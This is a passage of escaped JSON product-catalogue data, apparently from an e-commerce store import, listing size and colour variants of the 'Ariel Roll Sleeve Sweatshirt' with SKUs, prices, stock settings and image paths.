\\/w\\/h\\/wh09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1102\":{\"sku\":\"WH09-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-XS-Red\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1103\":{\"sku\":\"WH09-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-S-Green\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1104\":{\"sku\":\"WH09-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-S-Purple\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1105\":{\"sku\":\"WH09-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-S-Red\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1106\":{\"sku\":\"WH09-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-M-Green\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1107\":{\"sku\":\"WH09-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-M-Purple\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1108\":{\"sku\":\"WH09-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-M-Red\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1109\":{\"sku\":\"WH09-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-L-Green\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1110\":{\"sku\":\"WH09-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-L-Purple\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 